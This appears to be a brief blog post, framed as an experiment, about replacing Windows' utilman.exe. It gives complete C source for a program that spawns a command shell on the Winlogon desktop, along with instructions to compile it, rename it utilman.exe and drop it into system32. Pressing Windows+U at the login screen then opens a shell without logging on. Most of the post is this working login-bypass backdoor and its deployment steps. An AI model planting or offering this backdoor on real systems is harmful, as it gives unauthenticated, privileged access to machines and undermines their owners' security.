Comments posted by evilbitz on my Playing with utilman.exe post gave me a great idea for another experiment with utilman.exe:
You can compile the following example with Borland’s free C++ 5.5 compiler.
Fourth experiment
Compile this simple C program, name it utilman.exe and put it in the system32 directory:
#include <stdio.h> #include <windows.h> #include <tchar.h> void _tmain(void) { STARTUPINFO s; PROCESS_INFORMATION p; LPTSTR szCmdline = _tcsdup(TEXT("CMD")); LPTSTR szDesktop = _tcsdup(TEXT("WinSta0\\\\Winlogon")); ZeroMemory(&s, sizeof(s)); s.cb = sizeof(s); s.lpDesktop = szDesktop; ZeroMemory(&p, sizeof(p)); CreateProcess(NULL, szCmdline, NULL, NULL, FALSE, CREATE_NEW_CONSOLE, NULL, NULL, &s, &p); CloseHandle(p.hProcess); CloseHandle(p.hThread); }
Whenever you press the magic key sequence (Windows Logo key & U key), a command shell will open on the Winlogon desktop. And you don’t have to be logged on to do this.